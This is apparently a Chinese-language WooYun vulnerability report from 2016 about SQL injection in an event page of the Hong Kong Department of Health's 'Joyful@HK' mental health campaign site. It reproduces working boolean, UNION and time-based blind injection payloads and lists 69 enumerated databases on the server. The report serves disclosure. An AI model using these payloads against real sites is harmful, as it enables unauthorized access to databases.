当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0224063

漏洞标题:好心情@HK官网SQL注入导致同服多个数据库测漏(香港地區)

相关厂商:好心情@HK

漏洞作者: 路人甲

提交时间:2016-06-29 09:24

修复时间:2016-07-04 09:35

公开时间:2016-07-04 09:35

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-06-29: 细节已通知厂商并且等待厂商处理中
2016-06-29: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-07-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

「好心情@HK」(計劃)是由衞生署於2016年1月推行為期三年的全港性心理健康推廣計劃。
計劃目標:
提高公眾對心理健康推廣的參與,以及
提高公眾對精神健康的知識和了解。

详细说明:

http://**.**.**.**/sc/event_details.asp?id=3 (GET)

漏洞证明:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 8705=8705
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-7236 UNION ALL SELECT CHAR(113)+CHAR(105)+CHAR(109)+CHAR(122)+CHAR(113)+CHAR(117)+CHAR(90)+CHAR(79)+CHAR(115)+CHAR(80)+CHAR(81)+CHAR(66)+CHAR(113)+CHAR(77)+CHAR(100)+CHAR(113)+CHAR(110)+CHAR(112)+CHAR(107)+CHAR(113),NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: id=-9410 OR 3743=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [69]:
[*] 2plus3
[*] [2plus3-dev]
[*] [2plus3-test]
[*] [CHEUeCard-dev]
[*] [CHEUeCard-test]
[*] [CHEUenewsletter-dev]
[*] [CHEUenewsletter-test]
[*] [CHEUGame-dev]
[*] [CHEUGame-test]
[*] [CHEUGeneral-dev]
[*] [CHEUGeneral-test]
[*] [CHEUMembership-dev]
[*] [CHEUMembership-test]
[*] [ESR-dev-live]
[*] [ESR-prod-live]
[*] [ESR-test-live]
[*] [ExerciseRx-dev]
[*] [ExerciseRx-test]
[*] [healthatwork-dev-live]
[*] [healthatwork-prod-live]
[*] [healthatwork-test-live]
[*] [HEG-dev-grp01-svr01]
[*] [HEG-dev-grp01-svr02]
[*] [HEG-dev-grp02-svr01]
[*] [HEG-dev-grp02-svr02]
[*] [HEG-prod-grp01-svr01]
[*] [HEG-prod-grp01-svr02]
[*] [HEG-prod-grp02-svr01]
[*] [HEG-prod-grp02-svr02]
[*] [HEG-test-grp01-svr01]
[*] [HEG-test-grp01-svr02]
[*] [HEG-test-grp02-svr01]
[*] [HEG-test-grp02-svr02]
[*] [HEW-dev-live]
[*] [HEW-prod-live]
[*] [HEW-test-live]
[*] [MiniCHEUGeneral-dev]
[*] [MiniCHEUGeneral-test]
[*] [MiniWeb-dev]
[*] [MiniWeb-test]
[*] [StairClimbing-dev]
[*] [StairClimbing-test]
[*] [StartSmart-dev-live]
[*] [StartSmart-prod-live]
[*] [StartSmart-test-live]
[*] CHEU_HMEFORM_DEV
[*] CHEU_HMEFORM_PROD
[*] CHEU_HMEFORM_UAT
[*] CHEUeCard
[*] CHEUenewsletter
[*] CHEUenewsletter_test
[*] CHEUGame
[*] CHEUGeneral
[*] CHEUMembership
[*] cs_dev_live
[*] cs_prod_live
[*] cs_test_live
[*] ExerciseRx
[*] master
[*] mh_dev_live
[*] mh_dev_live_temp
[*] mh_prod_live
[*] mh_test_live
[*] MiniCHEUGeneral
[*] MiniWeb
[*] model
[*] msdb
[*] StairClimbing
[*] tempdb

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-07-04 09:35

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价